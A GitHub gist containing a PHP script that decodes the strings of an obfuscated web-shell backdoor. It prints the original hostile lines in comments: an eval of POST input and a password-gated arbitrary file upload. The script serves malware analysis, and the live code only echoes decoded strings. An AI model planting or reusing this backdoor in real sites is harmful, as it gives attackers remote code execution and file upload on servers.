Created
July 10, 2018 20:00
-
-
Save d0n601/a451a0a21d3c3f9e06df493d88623a05 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
echo 7457737+736723 . "\n"; // 8194460 some sort of identification I'm sure. | |
$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=") . "\n" ; // base64_decode | |
echo $raPo_rZluoE; // Figure out what the first string says | |
$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=") . "\n"; | |
// eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))])); | |
echo $ydSJPtnwrSv; // figure out what the second string says | |
$post_string = base64_decode(chr(97).chr(87)."Q".chr(61)) . "\n"; // The name of the POST being sent to eval() | |
echo $post_string; // let's see the post string | |
/* | |
Yean... don't run this. | |
if( $_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61))) { | |
@$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))][base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]); | |
} | |
*/ | |
$post_string_2 = base64_decode("d".chr(88).chr(65)."=") . "\n"; | |
echo $post_string_2; // lets see the second post string | |
$post_string_3 = base64_decode("d"."X".chr(65).chr(61)) . "\n"; | |
echo $post_string_3; // lets see the third post string (the comparison) | |
$file_name_1 = base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61)) . "\n"; | |
echo $file_name_1; | |
$file_name_2 = base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61)) . "\n"; | |
echo $file_name_2; | |
$file_name_3 = base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61)) . "\n"; | |
echo $file_name_1; | |
$file_name_4 = base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=") . "\n"; | |
echo $file_name_1; | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment